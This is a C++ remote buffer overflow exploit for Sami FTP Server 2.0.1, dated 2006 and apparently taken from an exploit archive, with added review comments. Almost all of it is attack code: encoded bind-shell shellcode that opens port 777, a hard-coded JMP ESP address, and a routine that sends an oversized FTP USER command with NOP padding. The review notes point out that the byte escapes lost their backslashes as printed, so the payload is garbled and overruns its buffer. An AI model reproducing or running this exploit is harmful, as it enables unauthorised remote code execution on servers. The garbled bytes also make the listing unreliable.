# Title : Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (cpp)
# Published : 2006-01-31
# Author : HolyGhost
// Two includes.
#include <fstream.h>
#include <winsock2.h>
// Project - Settings - Link > Object/Library modules 'Ws2_32.lib'
#pragma comment(lib, "ws2_32")
// Payload bytes appended after the second NOP run. Per the author's notes on
// the string it is XOR-encoded with 0x99 and its effect is a listener on TCP
// port 777 (the success message in main() says the same).
// NOTE(review): as printed, every "xNN" token has lost its escape backslash and
// is three ASCII characters, so strlen(MyShellCode) is three times the 379
// bytes given in the layout comment after main().
char MyShellCode[] = // XOR by x99x99x99x99.
"xD9xEExD9x74x24xF4x5Bx31xC9xB1x59x81x73x17x99x99"
"x99x99x83xEBxFCxE2" // Bind ShellCode port 777.
"xF4x71xA1x99x99x99xDAxD4xDDx99"
"x7ExE0x5FxE0x7CxD0x1FxD0x3Dx34xB7x70x3Dx83xE9x5E"
"x40x90x6Cx34x52x74x65xA2x17xD7x97x75xE7x41x7BxEA"
"x34x40x9Cx57xEBx67x2Ax8FxCExCAxABxC6xAAxABxB7xDD"
"xD5xD5x99x98xC2xCDx10x7Cx10xC4x99xF3xA9xC0xFDx12"
"x98x12xD9x95x12xE9x85x34x12xC1x91x72x95x14xCExB5"
"xC8xCBx66x49x10x5AxC0x72x89xF3x91xC7x98x77xF3x93"
"xC0x12xE4x99x19x60x9FxEDx7DxC8xCAx66xADx16x71x09"
"x99x99x99xC0x10x9Dx17x7Bx72xA8x66xFFx18x75x09x98"
"xCDxF1x98x98x99x99x66xCCxB9xCExCExCExCExDExCExDE"
"xCEx66xCCx85x10x5AxA8x66xCExCExF1x9Bx99x9Ax90x10"
"x7FxF3x89xCFxCAx66xCCx81xCExCAx66xCCx8DxCExCFxCA"
"x66xCCx89x10x5BxFFx18x75xCDx99x14xA5xBDxA8x59xF3"
"x8CxC0x6Ax32x10x4Ex5FxDDxBDx89xDDx67xDDxBDxA4x10"
"xE5xBDxD1x10xE5xBDxD5x10xE5xBDxC9x14xDDxBDx89xCD"
"xC9xC8xC8xC8xD8xC8xD0xC8xC8x66xECx99xC8x66xCCxA9"
"x10x78xF1x66x66x66x66x66xA8x66xCCxB5xCEx66xCCx95"
"x66xCCxB1xCAxCCxCFxCEx12xF5xBDx81x12xDCxA5x12xCD"
"x9CxE1x98x73x12xD3x81x12xC3xB9x98x72x7AxABxD0x12"
"xADx12x98x77xA8x66x65xA8x59x35xA1x79xEDx9Ex58x56"
"x94x98x5Ex72x6BxA2xE5xBDx8DxECx78x12xC3xBDx98x72"
"xFFx12x95xD2x12xC3x85x98x72x12x9Dx12x98x71x72x9B"
"xA8x59x10x73xC6xC7xC4xC2x5Bx91x99";
// Buffer the USER command is assembled into with strcat() in main().
// NOTE(review): 1329 equals the byte layout in the comment after main()
// (5 + 219 + 4 + 720 + 379 + 2), which leaves no room for the terminating NUL
// that strcat() writes; with the three-character tokens printed above the
// overrun is far larger.
static char PayLoad[1329];
// Target address: inet_addr() output (already network byte order) passed through
// htonl() once here and again when sin_addr is filled in main().
int IP;
// TCP port to connect to; 21 unless argv[2] is given.
int Port;
// Lengths of the first and second NOP runs (219 and 720, set in main()).
int szNOP1, szNOP2;
// Loop counter for the two padding loops.
int Nop;
// Jump ESP by library User32 on Win2000 SP4 fr..
// Hard-coded overwrite value tied to one User32 build; any other build or
// service pack gives a different address, so this only matches that one target.
char JmpESP[] = "x0CxEDxE3x77";
// Flag ID server Sami FTP.
// Banner substring required before anything is sent; "rn" is presumably a CRLF
// escape that lost its backslashes in this listing — verify against the original.
char TargetFlag[] = "220-rn220 Features p a .";
// Receive buffer for the banner. NOTE(review): main() calls recv() with a size
// of 256, so a banner longer than 200 bytes overruns this array; strstr() on it
// relies on the global's initial zero contents for termination.
char RecvBuff[200];
// Print the command-line help text, one line per entry, to stdout.
void usage(){
    static const char *helpText[] = {
        " ",
        "USAGE : ThisAppz [Target IP] [Port to connect FTP]",
        "If a port isnt specified, default port will 21.",
        "Without IP, the Xploit run in local mode [127.0.0.1]",
        " ",
    };
    const size_t lineCount = sizeof helpText / sizeof helpText[0];
    for (size_t idx = 0; idx < lineCount; idx++) {
        cout << helpText[idx] << endl;
    }
}
// Print the tool banner, one line per entry, to stdout.
void Info(){
    static const char *bannerText[] = {
        " ",
        " ============================================== v1.0 ==",
        " ====== Sami FTP Remote Buffer Overflow Exploit ======",
        " ================== Coded by HolyGhost ================",
        " ====== Distributed for educational purposes only =====",
        " ================== StormyTeam@free.fr ================",
        " ======================================================",
        " ",
    };
    const size_t lineCount = sizeof bannerText / sizeof bannerText[0];
    for (size_t idx = 0; idx < lineCount; idx++) {
        cout << bannerText[idx] << endl;
    }
}
// Entry point. Parses [IP] [port], connects to the FTP service, requires the
// TargetFlag banner, then sends a single oversized USER command and exits.
// On the wire the whole exchange is one FTP USER command with a ~1.3 KB
// argument (see the byte layout in the comment after this function), which is
// the artefact a network or application log would show.
// Returns 0 on success, -1 on usage, Winsock, connection or banner failure.
int main(int argc,char *argv[]){
Info();
// More than two positional arguments is a usage error.
if ( ( argc > 3 ) ){usage();return -1;}
if( argc > 1 ){
cout<<"argv[1]"<<"t"<<argv[1]<<endl;
// inet_addr() already returns network byte order; htonl() is applied here and
// again when sin_addr is filled below, so on a little-endian host the two swaps
// cancel. The inet_addr() failure value is not checked.
IP = htonl( inet_addr( argv[1] ) );}
else{
cout<<"Local test mode : 127.0.0.1"<<endl;
IP = htonl( inet_addr( "127.0.0.1" ) );}
if( argc == 3 ){
cout<<"argv[2]"<<"t"<<argv[2]<<endl;
// atoi() yields 0 for non-numeric input; no range check on the port.
Port = atoi( argv[2] );}
else{
cout<<"Port by default : 21"<<endl;
Port = 21;}
WSADATA wsadata;
if( WSAStartup( MAKEWORD( 2, 0 ),&wsadata )!=0 ){
cout<<"[-] WSAStartup error. Bye!"<<endl;
return -1;}
SOCKET sck;
fd_set mask;
struct timeval timeout;
struct sockaddr_in server;
sck = socket( AF_INET, SOCK_STREAM, 0 ); // TCP.
// NOTE(review): Winsock signals failure with INVALID_SOCKET rather than -1;
// WSACleanup() is also skipped on this path.
if( sck == -1 ){cout<<"[-] Socket() error. Bye!"<<endl; return -1;}
server.sin_family = AF_INET; // Address Internet 4 bytes.
server.sin_addr.s_addr = htonl( IP );
server.sin_port = htons( Port ); // Definition port.
// Try to connect on FTP server.
// The connect() result is ignored; the select() below on the write set is the
// only connection check. Nothing switches the socket to non-blocking mode, so
// connect() presumably blocks until it completes or fails.
connect( sck,( struct sockaddr *)&server, sizeof( server ) );
timeout.tv_sec = 3; // Delay 3 seconds.
timeout.tv_usec = 0;
FD_ZERO( &mask );
FD_SET( sck, &mask );
// Wait up to 3 s for the socket to become writable.
switch( select( sck + 1, NULL, &mask, NULL, &timeout ) ){
case -1:{ // Problem!
cout<<"[-] Select() error. Bye!"<<endl;
closesocket( sck );
return -1;}
case 0:{ // Problem! (timeout, reported as a failed connect)
cout<<"[-] Connect() error. Bye!"<<endl;
closesocket( sck );
return -1;}
default:
if(FD_ISSET( sck, &mask ) ){
// NOTE(review): reads up to 256 bytes into the 200-byte global RecvBuff and
// discards the byte count; strstr() below depends on the buffer's initial zero
// contents for termination.
recv( sck, RecvBuff, 256, 0 ); // Reception Flag ID.
cout<<"[+] Connected, checking the server for flag..."<<endl;
Sleep( 500 );
// Bail out unless the banner contains the expected TargetFlag substring.
if ( !strstr( RecvBuff, TargetFlag ) ){
cout<<"[-] This is not a valid flag from target! Bye."<<endl;
return -1;} // Bye! (socket left open, WSACleanup() skipped)
cout<<RecvBuff;
Sleep( 1000 );
cout<<"[+] Connected, constructing the PayLoad..."<<endl;
szNOP1 = 219; // First padding.
szNOP2 = 720; // Second padding.
// Zero-fill the PayLoad buffer. NOTE(review): NULL is passed as the int fill
// value; 0 is the conventional form.
memset( PayLoad, NULL, sizeof( PayLoad ) );
strcat( PayLoad, "USER " ); // Command User.
// First padding.
// NOTE(review): as printed, "x90" is a three-character string, not one byte,
// so these two loops alone append well over the 1329 bytes PayLoad holds and
// strcat() writes past the array. Even at one byte per token the layout totals
// exactly 1329, leaving no room for strcat()'s terminating NUL.
for( Nop = 0; Nop < szNOP1; Nop++ ){
strcat( PayLoad, "x90" );}
// New EIP register.
strcat( PayLoad, JmpESP );
// Second Padding.
for( Nop = 0; Nop < szNOP2; Nop++ ){
strcat( PayLoad, "x90" );}
strcat( PayLoad, MyShellCode );
strcat( PayLoad, "x0Dx0A" );
// Send fully PayLoad.
// Only SOCKET_ERROR is checked; a partial send is not detected, and this error
// path also leaves the socket open.
if( send( sck, PayLoad, strlen( PayLoad ), 0 ) == SOCKET_ERROR ){
cout<<"[-] Sending error, the server prolly rebooted."<<endl;
return -1;}
Sleep( 1000 );
cout<<"[+] Nice!!! See your log for execute an evil command."<<endl;
cout<<"[+] After, try to connect on FTP server by port 777."<<endl;
// Returns from inside the switch, so closesocket()/WSACleanup() below never run
// on the success path.
return 0;
}
}
closesocket( sck );
WSACleanup();
return 0; // Bye!
}
// Full PayLoad layout (1329 bytes) -
// [USER ] [padding NOP1] [rEIP] [padding NOP2] [ShellCode] [rn]
//    5         219          4        720          379        2   (5 + 219 + 4 + 720 + 379 + 2 = 1329)